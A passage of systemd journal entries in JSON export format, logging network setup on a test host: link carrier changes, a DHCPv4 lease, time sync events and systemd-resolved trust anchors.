"/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "MESSAGE" : "Started Network Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814367603" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=239;b=e2b08827b5804427b422c10c84f1567e;m=263b0df;t=5bd16df273047;x=cb21fbb4e8b86f83", "__REALTIME_TIMESTAMP" : "1615280814370887", "__MONOTONIC_TIMESTAMP" : "40087775", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814370880" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23a;b=e2b08827b5804427b422c10c84f1567e;m=263b942;t=5bd16df2738a9;x=1e97fceaacf3cfab", "__REALTIME_TIMESTAMP" : "1615280814373033", "__MONOTONIC_TIMESTAMP" : "40089922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait for Network to be Configured...", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814371365" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23b;b=e2b08827b5804427b422c10c84f1567e;m=263bc5c;t=5bd16df273bc4;x=7f61a6b98bd750de", "__REALTIME_TIMESTAMP" : "1615280814373828", "__MONOTONIC_TIMESTAMP" : "40090716", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814373715" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23c;b=e2b08827b5804427b422c10c84f1567e;m=263be97;t=5bd16df273dfe;x=34004f7e7f9e3d76", "__REALTIME_TIMESTAMP" : "1615280814374398", "__MONOTONIC_TIMESTAMP" : "40091287", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374391" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23d;b=e2b08827b5804427b422c10c84f1567e;m=263bf93;t=5bd16df273efa;x=a5c3a6ccbdc3e536", "__REALTIME_TIMESTAMP" : "1615280814374650", "__MONOTONIC_TIMESTAMP" : "40091539", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "CODE_LINE" : "3437", "MESSAGE" : "ens3: Lost carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374644" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23e;b=e2b08827b5804427b422c10c84f1567e;m=263cc6e;t=5bd16df274bd6;x=d585f0cc41c21d03", "__REALTIME_TIMESTAMP" : "1615280814377942", "__MONOTONIC_TIMESTAMP" : "40094830", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-dhcp6.c", "CODE_LINE" : "40", "CODE_FUNC" : "dhcp6_verify_link", "INTERFACE" : "lo", "MESSAGE" : "lo: Link is not managed by us", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814377900" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23f;b=e2b08827b5804427b422c10c84f1567e;m=263d92b;t=5bd16df275892;x=e4cb284037fe65d3", "__REALTIME_TIMESTAMP" : "1615280814381202", "__MONOTONIC_TIMESTAMP" : "40098091", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Name Resolution...", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814379434" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=240;b=e2b08827b5804427b422c10c84f1567e;m=263db29;t=5bd16df275a91;x=9e4386d1737efb05", "__REALTIME_TIMESTAMP" : "1615280814381713", "__MONOTONIC_TIMESTAMP" : "40098601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "294", "CODE_FUNC" : "link_enable_ipv6", "MESSAGE" : "ens3: IPv6 successfully enabled", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814381705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=241;b=e2b08827b5804427b422c10c84f1567e;m=264161f;t=5bd16df279586;x=b55c09cf1a27986a", "__REALTIME_TIMESTAMP" : "1615280814396806", "__MONOTONIC_TIMESTAMP" : "40113695", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814396796" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=242;b=e2b08827b5804427b422c10c84f1567e;m=26427f7;t=5bd16df27a75e;x=a6141f99eec106dd", "__REALTIME_TIMESTAMP" : "1615280814401374", "__MONOTONIC_TIMESTAMP" : "40118263", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "INTERFACE" : "ens3", "CODE_FILE" : "../src/network/networkd-dhcp4.c", "CODE_LINE" : "463", "CODE_FUNC" : "dhcp_lease_acquired", "MESSAGE" : "ens3: DHCPv4 address 192.168.10.95/24 via 192.168.10.1", "ADDRESS" : "192.168.10.95", "PREFIXLEN" : "24", "GATEWAY" : "192.168.10.1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401328" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=243;b=e2b08827b5804427b422c10c84f1567e;m=2642895;t=5bd16df27a7fd;x=45c1cf1e9fb525a9", "__REALTIME_TIMESTAMP" : "1615280814401533", "__MONOTONIC_TIMESTAMP" : "40118421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-manager.c", "CODE_LINE" : "1780", "CODE_FUNC" : "manager_set_hostname", "MESSAGE" : "Not connected to system bus, not setting hostname.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401352" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=244;b=e2b08827b5804427b422c10c84f1567e;m=2642c5f;t=5bd16df27abc6;x=25d6a409bd6c4b00", "__REALTIME_TIMESTAMP" : "1615280814402502", "__MONOTONIC_TIMESTAMP" : "40119391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814402353" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=245;b=e2b08827b5804427b422c10c84f1567e;m=264e0a5;t=5bd16df28600c;x=2b63421ba744fd47", "__REALTIME_TIMESTAMP" : "1615280814448652", "__MONOTONIC_TIMESTAMP" : "40165541", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_LINE" : "491", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "MESSAGE" : "Positive Trust Anchors:", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814448547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=246;b=e2b08827b5804427b422c10c84f1567e;m=264e25e;t=5bd16df2861c6;x=53e94fe147e04df4", "__REALTIME_TIMESTAMP" : "1615280814449094", "__MONOTONIC_TIMESTAMP" : "40165982", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 19036 8 2 49aac11d7b6f6446702e54a1607371607a1a41855200fd2ce1cdde32f24e8fb5", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449087" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=247;b=e2b08827b5804427b422c10c84f1567e;m=264e2ca;t=5bd16df286231;x=b3656ad15fdd74e0", "__REALTIME_TIMESTAMP" : "1615280814449201", "__MONOTONIC_TIMESTAMP" : "40166090", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "496", "MESSAGE" : ". IN DS 20326 8 2 e06d44b80b8f1d39a95c0b0d7c65d08458e880409bbc683457104237c7f8ec8d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=248;b=e2b08827b5804427b422c10c84f1567e;m=264e354;t=5bd16df2862bc;x=dd13fe1df3b59488", "__REALTIME_TIMESTAMP" : "1615280814449340", "__MONOTONIC_TIMESTAMP" : "40166228", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/resolve/resolved-dns-trust-anchor.c", "CODE_FUNC" : "dns_trust_anchor_dump", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_LINE" : "515", "MESSAGE" : "Negative trust anchors: 10.in-addr.arpa 16.172.in-addr.arpa 17.172.in-addr.arpa 18.172.in-addr.arpa 19.172.in-addr.arpa 20.172.in-addr.arpa 21.172.in-addr.arpa 22.172.in-addr.arpa 23.172.in-addr.arpa 24.172.in-addr.arpa 25.172.in-addr.arpa 26.172.in-addr.arpa 27.172.in-addr.arpa 28.172.in-addr.arpa 29.172.in-addr.arpa 30.172.in-addr.arpa 31.172.in-addr.arpa 168.192.in-addr.arpa d.f.ip6.arpa corp home internal intranet lan local private test", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814449320" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=249;b=e2b08827b5804427b422c10c84f1567e;m=264e894;t=5bd16df2867fb;x=4753c52001af8008", "__REALTIME_TIMESTAMP" : "1615280814450683", "__MONOTONIC_TIMESTAMP" : "40167572", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-resolved", "_PID" : "617", "_UID" : "101", "_GID" : "103", "_COMM" : "systemd-resolve", "_EXE" : "/lib/systemd/systemd-resolved", "_CMDLINE" : "/lib/systemd/systemd-resolved", "_CAP_EFFECTIVE" : "2500", "_SYSTEMD_CGROUP" : "/system.slice/systemd-resolved.service", "_SYSTEMD_UNIT" : "systemd-resolved.service", "_SYSTEMD_INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "CODE_FILE" : "../src/resolve/resolved-manager.c", "CODE_LINE" : "517", "CODE_FUNC" : "manager_watch_hostname", "MESSAGE" : "Using system hostname 'test-1'.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814450676" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24a;b=e2b08827b5804427b422c10c84f1567e;m=2650144;t=5bd16df2880ab;x=e7f248e70e6d207c", "__REALTIME_TIMESTAMP" : "1615280814457003", "__MONOTONIC_TIMESTAMP" : "40173892", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "MESSAGE" : "Started Network Name Resolution.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814452271" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24b;b=e2b08827b5804427b422c10c84f1567e;m=26501b2;t=5bd16df28811a;x=dd00ea5542cc278f", "__REALTIME_TIMESTAMP" : "1615280814457114", "__MONOTONIC_TIMESTAMP" : "40174002", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Host and Network Name Lookups.", "UNIT" : "nss-lookup.target", "INVOCATION_ID" : "6c96e169e38646ec879dc9c26874b07c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814454559" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24c;b=e2b08827b5804427b422c10c84f1567e;m=26510fd;t=5bd16df289064;x=9308da645fc2b823", "__REALTIME_TIMESTAMP" : "1615280814461028", "__MONOTONIC_TIMESTAMP" : "40177917", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network.", "UNIT" : "network.target", "INVOCATION_ID" : "f0292f15c43a4eef96deaed11fec60ec", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814459237" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=24d;b=e2b08827b5804427b422c10c84f1567e;m=2766411;t=5bd16df39e377;x=db1c5e6390bcf691", "__REALTIME_TIMESTAMP" : "1615280815596407", "__MONOTONIC_TIMESTAMP" : "41313297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : 